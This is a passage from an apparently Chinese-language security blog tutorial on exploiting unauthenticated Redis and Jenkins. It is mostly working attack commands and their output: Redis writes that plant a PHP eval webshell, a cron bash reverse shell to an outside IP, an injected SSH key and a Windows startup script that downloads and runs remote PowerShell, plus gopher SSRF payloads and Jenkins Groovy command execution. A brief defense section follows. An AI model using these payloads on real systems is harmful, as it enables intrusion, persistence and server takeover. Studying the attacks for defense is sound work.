<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">192.168.195.130:6379&gt; config set dir &#x2F;var&#x2F;www&#x2F;html</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt; config set dbfilename redis.php</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt; set webshell &quot;&lt;?php @eval($_POST[123]); ?&gt;&quot;</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt; save</span><br><span class="line">OK</span><br></pre></td></tr></table></figure>

<p>在写shell的时候我们可以加上换行符，避免出现一下情况(\r\n\r\n代表换行的意思，用redis写入的文件会自带一些版本信息，如果不换行可能会导致无法执行。)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set x &quot;\r\n\r\n&lt;?php phpinfo();?&gt;\r\n\r\n&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20200902195916508.png" alt="image-20200902195916508"></p>
<p>redis在生产环境里面数据量经常是十分庞大的，save到php文件里会超过php的允许文件大小，导致无法解析，我们可以先备份全部数据，然后在直接flushall全删掉。</p>
</li>
<li><p>计时任务反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;var&#x2F;spool&#x2F;cron&#x2F;</span><br></pre></td></tr></table></figure>

<p>这个目录下存放的是每个用户包括root的crontab任务，每个任务以创建者的名字命名。比如tom建的crontab任务对应的文件就是/var/spool/cron/tom，一般一个用户最多只有一个crontab文件。</p>
<p>攻击机监听</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ncat -lnvp 6666</span><br></pre></td></tr></table></figure>

<p>连接靶机</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ &#x2F;Applications&#x2F;MxSrvs&#x2F;bin&#x2F;redis&#x2F;bin&#x2F;redis-cli -h 192.168.195.130</span><br><span class="line">192.168.195.130:6379&gt; set x &quot;\n* * * * * &#x2F;bin&#x2F;bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;164.155.95.55&#x2F;6666 0&gt;&amp;1\n&quot;</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt; config set dir &#x2F;var&#x2F;spool&#x2F;cron&#x2F;</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt; config set dbfilename root</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt; save</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt; save</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>公钥登录</p>
<p>前提：</p>
<ol>
<li>Redis服务使用ROOT账号启动</li>
<li>服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器。</li>
</ol>
<p>kali生成一对密钥</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">root@steady:~# ssh-keygen -t rsa</span><br><span class="line">Generating public&#x2F;private rsa key pair.</span><br><span class="line">Enter file in which to save the key (&#x2F;root&#x2F;.ssh&#x2F;id_rsa): </span><br><span class="line">Enter passphrase (empty for no passphrase): </span><br><span class="line">Enter same passphrase again: </span><br><span class="line">Your identification has been saved in &#x2F;root&#x2F;.ssh&#x2F;id_rsa.</span><br><span class="line">Your public key has been saved in &#x2F;root&#x2F;.ssh&#x2F;id_rsa.pub.</span><br><span class="line">The key fingerprint is:</span><br><span class="line">SHA256:&#x2F;29LS6&#x2F;F9OXUPX8naWC+1A2HomVSr3hjDVkR2vyUOtI root@steady</span><br><span class="line">The key&#39;s randomart image is:</span><br><span class="line">+---[RSA 3072]----+</span><br><span class="line">|              o. |</span><br><span class="line">|             + ..|</span><br><span class="line">|            o +..|</span><br><span class="line">|           ..+.+o|</span><br><span class="line">|        S ..OE+.O|</span><br><span class="line">|         . O.B.X&#x3D;|</span><br><span class="line">|          + B O X|</span><br><span class="line">|           &#x3D; *.&#x3D;o|</span><br><span class="line">|            oo&#x3D;o.|</span><br><span class="line">+----[SHA256]-----+</span><br><span class="line">root@steady:~# </span><br></pre></td></tr></table></figure>

<p>kali查看公钥</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@steady:~&#x2F;.ssh# cat &#x2F;root&#x2F;.ssh&#x2F;id_rsa.pub</span><br><span class="line">ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCYvK62OIoY1PHjAGXb4EzPeqI2JIp8b2IsX1YvGTH4o&#x2F;V&#x2F;KP75HMwGWWQwdZudb3taAKfyPlfoKszLm5a0Yj2WCz3m8qOIKsXIrMel9ik&#x2F;933ZOQmSVQWOh3Q26uBFteRFRg4dJ1t4uIE94hQhc4Hene7ypDfeKDTnRrZQNx0h4fB5l5bbrPBH7ATcj3H4159+OPTMkZ9u+bQK+Uo2yWwFfwKdsvLTLtGQJ9s+zIwes8dC+UdIjtVphVKj9fNABnYVpkfc42yAPpDLCaM3lbIHKeshsSllz7CctU9YmGwwpAfLiW6ojt7Ffqe5wrPJIMjbUdB95XQCtr3z4XHv&#x2F;TEwJlW4n7miwi3OUbLKrQNwAUNjPEKKmGzwsS+kR85Z6FqjghLiLc8A19j28JtAfmISM&#x2F;xZ&#x2F;SIRoeR+N801sup+jOMo7HbpbJK2SRJ8NSHoGzK5uXa7JrqtOZyBmYqAeNNiysDt9uRHwE0Kqmf0&#x2F;Q8oRe2hJ3eKqwHsTNkIFwG1nDs&#x3D; root@steady</span><br></pre></td></tr></table></figure>

<p>公钥上传到受害机器</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">192.168.195.130:6379&gt; config set dir &#x2F;root&#x2F;.ssh&#x2F;</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt; config set dbfilename authorized_keys</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt; set x &quot;\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCYvK62OIoY1PHjAGXb4EzPeqI2JIp8b2IsX1YvGTH4o&#x2F;V&#x2F;KP75HMwGWWQwdZudb3taAKfyPlfoKszLm5a0Yj2WCz3m8qOIKsXIrMel9ik&#x2F;933ZOQmSVQWOh3Q26uBFteRFRg4dJ1t4uIE94hQhc4Hene7ypDfeKDTnRrZQNx0h4fB5l5bbrPBH7ATcj3H4159+OPTMkZ9u+bQK+Uo2yWwFfwKdsvLTLtGQJ9s+zIwes8dC+UdIjtVphVKj9fNABnYVpkfc42yAPpDLCaM3lbIHKeshsSllz7CctU9YmGwwpAfLiW6ojt7Ffqe5wrPJIMjbUdB95XQCtr3z4XHv&#x2F;TEwJlW4n7miwi3OUbLKrQNwAUNjPEKKmGzwsS+kR85Z6FqjghLiLc8A19j28JtAfmISM&#x2F;xZ&#x2F;SIRoeR+N801sup+jOMo7HbpbJK2SRJ8NSHoGzK5uXa7JrqtOZyBmYqAeNNiysDt9uRHwE0Kqmf0&#x2F;Q8oRe2hJ3eKqwHsTNkIFwG1nDs&#x3D; root@steady\n\n\n&quot;</span><br><span class="line">OK</span><br><span class="line">192.168.195.130:6379&gt; save</span><br><span class="line">OK</span><br></pre></td></tr></table></figure>

<p>使用攻击机并带上私钥登录目标服务器</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ ssh -i  &#x2F;Users&#x2F;apple&#x2F;Desktop&#x2F;id_rsa  root@192.168.195.130</span><br><span class="line">Linux steady 5.4.0-kali3-amd64 #1 SMP Debian 5.4.13-1kali1 (2020-01-20) x86_64</span><br><span class="line"></span><br><span class="line">The programs included with the Kali GNU&#x2F;Linux system are free software;</span><br><span class="line">the exact distribution terms for each program are described in the</span><br><span class="line">individual files in &#x2F;usr&#x2F;share&#x2F;doc&#x2F;*&#x2F;copyright.</span><br><span class="line"></span><br><span class="line">Kali GNU&#x2F;Linux comes with ABSOLUTELY NO WARRANTY, to the extent</span><br><span class="line">permitted by applicable law.</span><br><span class="line">root@steady:~#</span><br></pre></td></tr></table></figure>


</li>
</ul>
</li>
</ul>
<ul>
<li><p>利用 Redis 写入 bat 文件到启动项(windows)</p>
<p>启动项：</p>
<p>启动项目，就是开机的时候系统会在前台或者后台运行的程序。许多程序的自启动，给我们带来了很多方便。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">xxx.xxx.xxx.1:6379&gt; config set dir &quot;C:&#x2F;Users&#x2F;Administrator&#x2F;AppData&#x2F;Roaming&#x2F;Microsoft&#x2F;Windows&#x2F;Start Menu&#x2F;Programs&#x2F;startup&#x2F;&quot;</span><br><span class="line">OK</span><br><span class="line">xxx.xxx.xxx.1:6379&gt; config set dbfilename shell.bat</span><br><span class="line">OK</span><br><span class="line">xxx.xxx.xxx.1:6379&gt; set x &quot;\r\n\r\npowershell -windowstyle hidden -exec bypass -c \&quot;IEX (New-Object Net.WebClient).DownloadString(&#39;http:&#x2F;&#x2F;xxx.xxx.xxx.2&#x2F;shell.ps1&#39;);xx.ps1\&quot;\r\n\r\n&quot;</span><br><span class="line">OK</span><br><span class="line">xxx.xxx.xxx.1:6379&gt; save</span><br><span class="line">OK</span><br></pre></td></tr></table></figure>

<p>使用msf或者cs进行监听，ps会反弹一个shell。</p>
</li>
</ul>
<ul>
<li><h5 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h5><ul>
<li><p>修改 redis.conf 文件</p>
<p>添加密码认证</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">添加 requirepass mypassword</span><br></pre></td></tr></table></figure>

<p>禁止外网访问</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">添加 bind 127.0.0.1</span><br></pre></td></tr></table></figure>
</li>
<li><p>阻止其他用户添加新的公钥</p>
<p>将 <code>authorized_keys</code> 的权限设置为对拥有者只读，其他用户没有任何权限</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod 400 ~&#x2F;.ssh&#x2F;authorized_keys</span><br></pre></td></tr></table></figure>

<p>保证 <code>authorized_keys</code> 的权限不会被改掉，需要设置该文件的 immutable 位权限：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"># chattr +i ~&#x2F;.ssh&#x2F;authorized_keys</span><br></pre></td></tr></table></figure>
</li>
<li><p>用户还可以重命名 <code>~/.ssh</code>，然后新建新的 <code>~/.ssh</code> 目录和 <code>authorized_keys</code> 文件。要避免这种情况，需要设置 <code>~./ssh</code> 的 immutable 位权限</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"># chattr +i ~&#x2F;.ssh</span><br></pre></td></tr></table></figure>



</li>
</ul>
</li>
</ul>
<h6 id="redis主从复制漏洞"><a href="#redis主从复制漏洞" class="headerlink" title="redis主从复制漏洞"></a>redis主从复制漏洞</h6><p>主从复制</p>
<p>主从模式就是一个redis实例作为主机，其他实例作为备份机，但是主机和备份机数据相同，主机器负责写，从机器只负责读。通过读写分离可以大幅度减轻流量的压力，算是一种通过牺牲空间来换取效率的缓解方式。</p>
<p>Redis模块</p>
<p>在Reids 4.x之后，Redis新增了模块功能，通过外部拓展，可以实现在redis中实现一个新的Redis命令，通过写c语言并编译出.so文件。</p>
<p>在两个Redis实例设置主从模式的时候，Redis的主机实例可以通过FULLRESYNC同步文件到从机上。</p>
<p>然后在从机上加载so文件，我们就可以执行拓展的新命令了。</p>
<h6 id="redis与gopger协议"><a href="#redis与gopger协议" class="headerlink" title="redis与gopger协议"></a>redis与gopger协议</h6><ul>
<li><p>gopher协议</p>
<p>gopher是Internet上一个非常有名的信息查找系统，它将Internet上的文件组织成某种索引，很方便地将用户从Internet的一处带到另一处。在WWW出现之前，gopher是Internet上最主要的信息检索工具，gopher站点也是最主要的站点，使用tcp70端口。但在WWW出现后，gopher失去了昔日的辉煌。现在它基本过时，人们很少再使用它；</p>
</li>
<li><p>gopher协议支持发出GET、POST请求</p>
<p>gopher协议格式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">URL:gopher:&#x2F;&#x2F;&lt;host&gt;:&lt;port&gt;&#x2F;&lt;gopher-path&gt;_后接TCP数据流</span><br></pre></td></tr></table></figure>

<ul>
<li><p>gopher发送请求HTTP POST请求</p>
<p>POST与GET传参的区别：它有4个参数为必要参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">root@steady:~# curl gopher:&#x2F;&#x2F;172.20.10.3:8888&#x2F;_POST%20&#x2F;tes&#x2F;post.php%20HTTP&#x2F;1.1%0d%0AHost:172.20.10.3%0d%0AContent-Type:application&#x2F;x-www-form-urlencoded%0d%0AContent-Length:12%0d%0A%0d%0Aname&#x3D;purplet%0d%0A</span><br><span class="line">HTTP&#x2F;1.1 404 Not Found</span><br><span class="line">Date: Sun, 20 Sep 2020 09:04:49 GMT</span><br><span class="line">Server: Apache</span><br><span class="line">Content-Length: 210</span><br><span class="line">Content-Type: text&#x2F;html; charset&#x3D;iso-8859-1</span><br><span class="line"></span><br><span class="line">&lt;!DOCTYPE HTML PUBLIC &quot;-&#x2F;&#x2F;IETF&#x2F;&#x2F;DTD HTML 2.0&#x2F;&#x2F;EN&quot;&gt;</span><br><span class="line">&lt;html&gt;&lt;head&gt;</span><br><span class="line">&lt;title&gt;404 Not Found&lt;&#x2F;title&gt;</span><br><span class="line">&lt;&#x2F;head&gt;&lt;body&gt;</span><br><span class="line">&lt;h1&gt;Not Found&lt;&#x2F;h1&gt;</span><br><span class="line">&lt;p&gt;The requested URL &#x2F;tes&#x2F;post.php was not found on this server.&lt;&#x2F;p&gt;</span><br><span class="line">&lt;&#x2F;body&gt;&lt;&#x2F;html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
</li>
<li><p>gopher发送请求HTTP GET请求</p>
<p>mac监听端口，kali尝试使用gopger发起get请求</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@steady:~# curl gopher:&#x2F;&#x2F;172.20.10.3:1234&#x2F;_abcd</span><br></pre></td></tr></table></figure>

<p>注意：steady是要传递的数据，_会被吃掉不会传递过去。</p>
<p>mac查看是否收到GET请求</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ ncat -lnvp 1234</span><br><span class="line">abcd</span><br></pre></td></tr></table></figure>

<p>注意：abcd是要传递的数据，_会被吃掉不会传递过去。</p>
</li>
<li><p>gopher发送原始的请求包</p>
<p>gopher发送原始的http请求包</p>
<p>在gopher协议中发送HTTP的数据，需要以下三步：</p>
<p>1、构造HTTP数据包 </p>
<p>2、URL编码、替换回车换行为%0d%0a </p>
<p>3、发送gopher协议</p>
<p>新建php文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">echo</span> <span class="string">&quot;Hello &quot;</span>.$_GET[<span class="string">&quot;name&quot;</span>].<span class="string">&quot;\n&quot;</span><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>1、问号（？）需要转码为URL编码，也就是%3f</p>
<p>2、回车换行要变为%0d%0a,但如果直接用工具转，可能只会有%0a</p>
<p>3、在HTTP包的最后要加%0d%0a，代表消息结束（具体可研究HTTP包结束）</p>
<p>4.、gopher协议后的IP一定要接端口</p>
<p>在mac上新建一个php文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php    echo &quot;Hello &quot;.$_GET[&quot;name&quot;].&quot;\n&quot;?&gt;</span><br></pre></td></tr></table></figure>

<p>正常浏览器访问</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;172.20.10.3:8888&#x2F;1.php?name&#x3D;11</span><br></pre></td></tr></table></figure>

<p>使用gopher协议访问</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">root@steady:~# curl gopher:&#x2F;&#x2F;172.20.10.3:8888&#x2F;_GET%20&#x2F;1.php?name&#x3D;11%20HTTP&#x2F;1.1%0d%0aHost:%20172.20.10.3%0d%0a</span><br><span class="line">HTTP&#x2F;1.1 200 OK</span><br><span class="line">Date: Sun, 20 Sep 2020 09:10:18 GMT</span><br><span class="line">Server: Apache</span><br><span class="line">X-Powered-By: PHP&#x2F;5.6.40</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Content-Type: text&#x2F;html; charset&#x3D;UTF-8</span><br><span class="line"></span><br><span class="line">9</span><br><span class="line">Hello 11</span><br><span class="line"></span><br><span class="line">0</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>利用gopher协议向redis写shell</p>
<p>常见场景：</p>
<ul>
<li>1、目标redis公网不能直接访问。</li>
<li>2、能够利用ssrf漏洞</li>
</ul>
<p>mac生成poc</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ python &#x2F;Users&#x2F;apple&#x2F;Downloads&#x2F;sec_tools-master&#x2F;redis-over-gopher&#x2F;redis-over-gopher.py</span><br><span class="line">gopher:&#x2F;&#x2F;172.20.10.10:6379&#x2F;_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%31%33%0d%0a%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a</span><br></pre></td></tr></table></figure>

<p>尝试使用gopger协议</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ curl gopher:&#x2F;&#x2F;172.20.10.10:6379&#x2F;_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%31%33%0d%0a%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a</span><br><span class="line">+OK</span><br><span class="line">+OK</span><br><span class="line">+OK</span><br><span class="line">+OK</span><br><span class="line">+OK</span><br></pre></td></tr></table></figure>

<p>成功写入webshell。</p>
<p>使用gopherus</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">➜  Gopherus python gopherus.py --exploit redis</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  ________              .__</span><br><span class="line"> &#x2F;  _____&#x2F;  ____ ______ |  |__   ___________ __ __  ______</span><br><span class="line">&#x2F;   \  ___ &#x2F;  _ \\____ \|  |  \_&#x2F; __ \_  __ \  |  \&#x2F;  ___&#x2F;</span><br><span class="line">\    \_\  (  &lt;_&gt; )  |_&gt; &gt;   Y  \  ___&#x2F;|  | \&#x2F;  |  &#x2F;\___ \</span><br><span class="line"> \______  &#x2F;\____&#x2F;|   __&#x2F;|___|  &#x2F;\___  &gt;__|  |____&#x2F;&#x2F;____  &gt;</span><br><span class="line">        \&#x2F;       |__|        \&#x2F;     \&#x2F;                 \&#x2F;</span><br><span class="line"></span><br><span class="line">		author: $_SpyD3r_$</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Ready To get SHELL</span><br><span class="line"></span><br><span class="line">What do you want?? (ReverseShell&#x2F;PHPShell): PHPSHELL</span><br><span class="line"></span><br><span class="line">Give web root location of server (default is &#x2F;var&#x2F;www&#x2F;html):</span><br><span class="line">Give PHP Payload (We have default PHP Shell):</span><br><span class="line"></span><br><span class="line">Your gopher link is Ready to get PHP Shell:</span><br><span class="line"></span><br><span class="line">gopher:&#x2F;&#x2F;127.0.0.1:6379&#x2F;_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A&#x2F;var&#x2F;www&#x2F;html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A</span><br><span class="line"></span><br><span class="line">When it&#39;s done you can get PHP Shell in &#x2F;shell.php at the server with &#96;cmd&#96; as parmeter.</span><br><span class="line"></span><br><span class="line">-----------Made-by-SpyD3r-----------</span><br></pre></td></tr></table></figure>



</li>
</ul>
<h5 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h5><h6 id="限制"><a href="#限制" class="headerlink" title="限制"></a>限制</h6><ul>
<li>Windows的启动项和计划任务并不是以文本形式保存在固定位置的</li>
<li>Windows的Redis最新版本还停留在3.2，不可以利用主从漏洞getshell。</li>
</ul>
<h6 id="redis未授权访问漏洞利用与防御-1"><a href="#redis未授权访问漏洞利用与防御-1" class="headerlink" title="redis未授权访问漏洞利用与防御"></a>redis未授权访问漏洞利用与防御</h6><ul>
<li><p>有web环境</p>
<p>利用<code>RedisWriteFile</code>文件写入shell，脚本将自己模拟为master，设置对端为slave。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python RedisWriteFile.py --rhost&#x3D;[target_ip] --rport&#x3D;[target_redis_port] --lhost&#x3D;[evil_master_host] --lport&#x3D;[random] --rpath&#x3D;&quot;[path_to_write]&quot; --rfile&#x3D;&quot;[filename]&quot; --lfile&#x3D;[filename]</span><br></pre></td></tr></table></figure>
</li>
<li><p>无web环境</p>
<ul>
<li><p>启动项</p>
<p>系统服务、计划任务、注册表启动项、用户的startup目录，前三种是无法通过单纯向某目录中写文件实现精准篡改的，因此只有startup目录可以利用。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</span><br></pre></td></tr></table></figure>

<p>利用条件：</p>
<p>管理员将Redis添加了服务项并配了一个高权限（如Administrator甚至SYSTEM），并且主机重启才可以生效。</p>
</li>
<li><p>mof</p>
<p>托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。文件路径为：<code>C:/windows/system32/wbem/mof/nullevt.mof</code>，其作用是每隔五秒就会去监控进程创建和死亡。</p>
<p>利用条件：</p>
<p>默认5秒执行一次的设定只有03及以下系统才会有</p>
</li>
<li><p>修改dll等。</p>
</li>
</ul>
</li>
</ul>
<h3 id="8080端口–Jenkins"><a href="#8080端口–Jenkins" class="headerlink" title="8080端口–Jenkins"></a>8080端口–Jenkins</h3><h4 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h4><p>默认情况下 Jenkins 面板中用户可以选择执行脚本界面来操作一些系统层命令，攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。</p>
<h4 id="漏洞利用-2"><a href="#漏洞利用-2" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><h5 id="漏洞验证"><a href="#漏洞验证" class="headerlink" title="漏洞验证"></a>漏洞验证</h5><p>访问<code>http://xxxxx:8080/</code></p>
<p><img src="https://steady-1302023625.cos.ap-beijing.myqcloud.com/makedown/image-20201124144533536.png" alt="image-20201124144533536"></p>
<p>但并不能证明是未授权访问，我们需要访问<code>xxxxx:8080/manage</code>，来验证是否成功。如果可以直接访问则表示未授权，否则直接跳转<code>http://xxxxx:8080/login?from=%2Fmanage</code>。</p>
<h5 id="未授权访问写shell"><a href="#未授权访问写shell" class="headerlink" title="未授权访问写shell"></a>未授权访问写shell</h5><p>直接访问脚本命令行</p>
<p>执行命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">println &quot;whoami&quot;.execute().text</span><br></pre></td></tr></table></figure>

<p>写入文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">new File (&quot;&#x2F;var&#x2F;www&#x2F;html&#x2F;shell.php&quot;).write(&#39;&lt;?php phpinfo(); ?&gt;&#39;);</span><br></pre></td></tr></table></figure>


  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>加载评论需要在浏览器启用 JavaScript 脚本支持。</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
